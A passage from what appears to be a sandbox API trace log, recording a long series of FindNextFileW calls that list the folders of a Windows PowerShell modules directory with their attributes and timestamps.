dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0264.632] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0264.633] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0264.633] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0264.633] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0264.633] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0264.633] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0264.633] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0264.633] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0264.634] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0264.634] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0264.634] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0264.634] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0264.634] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0264.634] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0264.634] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0264.635] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0264.635] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0264.635] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0264.635] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0264.635] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0264.635] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0264.636] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0264.636] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0264.636] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0264.636] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0264.636] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0264.636] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0264.637] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0264.637] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0264.637] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0264.637] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0264.637] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0264.637] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0264.638] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0264.638] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0264.638] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0264.638] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0264.638] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0264.638] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0264.638] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0264.639] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0264.639] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0264.639] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0264.639] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0264.639] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0264.639] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0264.639] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, 